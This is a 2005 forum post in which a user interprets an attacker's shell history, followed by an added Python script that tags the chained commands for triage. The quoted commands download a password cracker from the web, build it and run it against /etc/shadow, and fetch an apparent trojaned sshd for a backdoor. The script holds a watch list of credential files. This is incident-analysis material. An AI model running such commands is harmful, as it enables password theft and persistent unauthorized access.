August 30th, 2005, 08:36 PM
#22
Junior Member
My knowledge in Linux is slowly coming back, but is this interpretation correct?
w
Does a who command to see who is all on the system.
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
These commands are broken into parts shown by a separator (the semicolon). First wget command grabs what I am guessing is John the Ripper or another password cracker. Second command is to basically unzip the file in Windows terms. Then he removes the original zipped up archive. Changes the directory and makes the exe. Next command changes directory to the executable file. Then the ./ runs the program on /etc/shadow. This would make me assume that he already had root from the exploit, but probably would rather have a valid account for later use.
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
Gets a file which I am guessing is an SSH server, either whole because the target server didn't have the files installed or a hacked up version for his use.
The rest of it is pretty much setting up the backdoor and cleaning up a little.
That is just my interpretation of it broken down into tiny bits. Please point out any faulty points in my logic though, because I really need to get my Linux skills back.
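Added example, not part of the original post: a small triage script that splits the command chains quoted above on the semicolon and tags each step the way the post walks through them (download, extract, delete archive, build, run against /etc/shadow). The tag names, function names and the SENSITIVE watch list are assumptions made for this illustration.

```python
import shlex

# Command lines quoted in the post above, joined onto single lines.
HISTORY = [
    "w",
    "wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;"
    "rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;"
    "cd ../run;./john /etc/shadow",
    "wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;"
    "rm -rf sshd.tar.gz;cd sshd;cd apps/ssh",
]
SENSITIVE = ("/etc/shadow", "/etc/passwd")  # assumed watch list


def analyze(line):
    """Return sorted finding tags (hypothetical names) for one history line."""
    findings, downloaded, extracted = set(), set(), set()
    for part in line.split(";"):  # ';' separates the chained commands
        argv = shlex.split(part)
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        base = cmd.rsplit("/", 1)[-1]
        if base in ("wget", "curl"):
            # Remember the file name each URL will be saved under.
            urls = [a for a in args if not a.startswith("-")]
            downloaded |= {u.rstrip("/").rsplit("/", 1)[-1] for u in urls}
            if urls:
                findings.add("download")
        elif base == "tar" and downloaded & set(args):
            extracted |= downloaded & set(args)
            findings.add("extract-downloaded")
        elif base == "rm" and extracted & set(args):
            findings.add("delete-archive-after-extract")
        elif base in ("make", "gcc", "cc"):
            findings.add("build-on-host")
        elif cmd.startswith("./"):
            findings.add("run-local-binary")
        if any(a in SENSITIVE for a in args):
            findings.add("reads-credential-file")
    return sorted(findings)


def is_fetch_build_crack(line):
    """True when one chain downloads code, runs it locally and touches a credential file."""
    return {"download", "run-local-binary", "reads-credential-file"} <= set(analyze(line))


if __name__ == "__main__":
    for entry in HISTORY:
        print(is_fetch_build_crack(entry), analyze(entry), "<-", entry[:40])
```

Only the john chain matches the full fetch-build-run pattern; the sshd chain stops at download, extract and archive removal, which fits the post's reading that the remaining setup happens in later commands.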